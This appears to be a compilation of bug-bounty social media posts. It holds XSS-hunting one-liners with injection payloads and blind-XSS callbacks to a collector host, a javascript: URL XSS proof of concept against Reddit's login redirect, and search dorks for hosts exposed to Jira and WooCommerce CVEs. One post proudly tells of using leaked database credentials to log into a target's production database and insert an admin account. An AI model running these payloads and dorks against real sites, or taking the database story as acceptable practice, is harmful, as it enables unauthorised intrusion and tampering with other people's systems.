Hey Hunter's,
DarkShadow here back again, dropping some one-liner killer XSS commands😉

Cleaned XSS Payload Hunting Commands:


1. Wayback + httpx + GF + Dalfox

cat domains.txt | httpx -silent -ports 80,443,8080,8443,3000,8000 | waybackurls | grep "=" | uro | gf xss | qsreplace '"><script>alert(1)</script>' | while read url; do curl -s "$url" | grep -q "<script>alert(1)</script>" && echo "[XSS] $url"; done

2. Gospider + Dalfox

gospider -S URLS.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -oP "https?://[^ ]+" | grep "=" | qsreplace -a | dalfox pipe

3. Wayback + GF + Blind XSS via Dalfox

waybackurls target.com | gf xss | sed 's/=.*/=/' | sort -u | dalfox -b yoursubdomain.xss.ht pipe

4. Gospider + Dalfox (Deep Crawl)

gospider -S targets.txt -c 20 -d 3 --js --sitemap --robots | grep -oP "https?://[^\s']+" | grep "=" | uro | dalfox pipe -o gospider_xss.txt

5. Dalfox Direct with Blind XSS

cat urls.txt | dalfox pipe -b yourdomain.xss

Required tools are:

httpx, waybackurls, uro, gf, qsreplace, curl, gospider, dalfox

If you find this helpful and want more cutting-edge tips and tricks, don’t forget to follow me 👉🏼 DarkShadow

#bugbountytips #xss

Good morning hacker's,
Let's start morning to hack Reddit account 😉

Hey Hunters,
DarkShadow here, back again dropping an old-school Reddit XSS PoC for you to check out!

Let’s break it down and understand the logic behind the vulnerability.


Vulnerable Parameter: ?dest=

What does the dest parameter do?

The dest parameter is commonly used in login flows to redirect users after successful authentication. For example:

A user tries to access a protected page.

Reddit redirects them to:
/login/?dest=/protected/resource

After login, the site redirects them to the original dest URL.

Sounds fine, right? But here’s the twist...

✅ PoC Steps (Super Simple):

https://www.reddit.com/login/?dest=javascript:alert(document.domain)

Boom💥. That’s it.
Just throw that URL and watch the magic happen. No need for complex encoding or obfuscation — just a mindset shift.

keep your payloads sharp and your eyes sharper.
Don’t forget to react, share, and follow me in X
👉🏼 DarkShadow

#bugbountytips #xss

CVE-2025-22157: Improper Access Control in Atlassian Jira, 7.2 rating❗️

The vulnerability allows an authenticated attackers to escalate their privileges to administrator level or gain access to restricted workflows in Jira.

Search at Netlas.io:
👉 Link: https://nt.ls/lVuft
👉 Dork: http.meta:"content=\"JIRA\""

Vendor's advisory: https://confluence.atlassian.com/security/security-bulletin-may-20-2025-1561365992.html

🔥 Tried something new! Just dropped a quick guide on rooting Android Emulator + setting up Burp Suite for HTTPS interception.

✅ Manual setup
✅ Magisk + rootAVD
✅ Trusted Burp cert
✅ Meme vibes included 😎

📖 Read here: https://medium.com/p/how-to-root-your-android-emulator-hack-yourself-with-burp-suite-manually-like-a-legend-ef4fbe28ceab

Hey Hunters,

DarkShadow here back again—sorry for the delay, I’ve been a little sick. Please keep me in your prayers.

Anyway, just dropping a trick on how an out-of-scope target can lead to an in-scope critical vulnerability!

The story starts from a normal endpoint. When I clicked it, it redirected me somewhere else, and after resolving something, it returned the content. To check further what’s going on, I opened the request in Burp Suite. The endpoint performed a 302 redirect to an external domain, which was out of scope.

But here’s the twist—it was still showing the content from the original website I had requested. So I thought, maybe it’s working like a proxy?

Here comes the real mastery. Most bug hunters ignore this kind of behavior, but I decided to dig deeper. And yeah, I found a file: backup.zip
I instantly unzipped it and noticed a config/ folder, and inside it—a config.php file.

Guess what?
I found MySQL database credentials, and the most interesting part? The database URL was publicly accessible—not just localhost!

I tried connecting… and boom! I was successfully connected.
But wait—this domain is out of scope, right?

That’s what I thought too… until I started reading there massive database and was shocked—
It was the target's database, exposed through their proxy server, which had the hardcoded credentials in the config file.

At that moment, I was really excited.
Then I thought: What if I create a new user with admin role?
So I did exactly that—added an admin user to the database.

Now, on the target website, there’s a normal login page (not labeled as admin login), but I tried logging in with the new credentials and guess what?

BOOM! 💥
It logged me into the admin dashboard.

And just like that, I turned an out-of-scope target into a critical in-scope auth bypass vulnerability.✅


So guys, if you enjoyed this method, don’t forget to show some love—and please, pray for me, I’m really sick right now.

And don’t forget to follow me on X (Twitter): x.com/Darkshadow2bd

#bugbountytips #infosec

http://powerade.com.s3.amazonaws.com/index.html

guy's let's see whos explaination is better!

what is the impact after takeover a in-scop target S3 bucket?🤔

‎Follow the Brut Security channel on WhatsApp: https://whatsapp.com/channel/0029VacUEmpCnA8014ZLnm1L

CVE-2025-47577: Unrestricted Upload of File with Dangerous Type in TI WooCommerce Wishlist Plugin, 10.0 rating 🔥🔥🔥

Failure to check the types of uploaded files allows attackers to upload a web shell to the server and perform RCE.

Search at Netlas.io:
👉 Link: https://nt.ls/jYyss
👉 Dork: http.body:"plugins/ti-woocommerce-wishlist"

Read more: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ti-woocommerce-wishlist/ti-woocommerce-wishlist-292-unauthenticated-arbitrary-file-upload